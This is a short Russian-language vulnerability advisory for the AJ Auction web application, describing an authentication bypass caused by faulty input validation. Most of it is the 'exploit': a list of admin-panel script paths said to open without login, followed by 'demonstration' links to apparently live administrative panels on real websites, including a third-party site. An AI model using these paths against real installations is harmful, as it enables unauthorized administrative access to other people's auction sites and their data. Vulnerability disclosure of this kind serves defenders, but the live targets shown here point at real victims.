Программа: AJ Auction

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных в множественных сценариях. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

http://localhost/[path]/admin/site.php
http://localhost/[path]/admin/auction.php
http://localhost/[path]/admin/mail.php
http://localhost/[path]/admin/fee_setting.php
http://localhost/[path]/admin/earnings.php
http://localhost/[path]/admin/insertion_fee_settings.php
http://localhost/[path]/admin/custom_category.php
http://localhost/[path]/admin/subcategory.php
http://localhost/[path]/admin/category.php
http://localhost/[path]/admin/report.php
http://localhost/[path]/amdin/store_manager.php
http://localhost/[path]/admin/choose_sell_format.php

Демонстрация:

http://www.ajauctionpro.com/ajauction_platinum/admin/index.php
http://www.tapinglobal.com/admin/

Web2.0

http://www.ajauctionpro.com/auction_web2.0/admin/index.php



Оставить мнение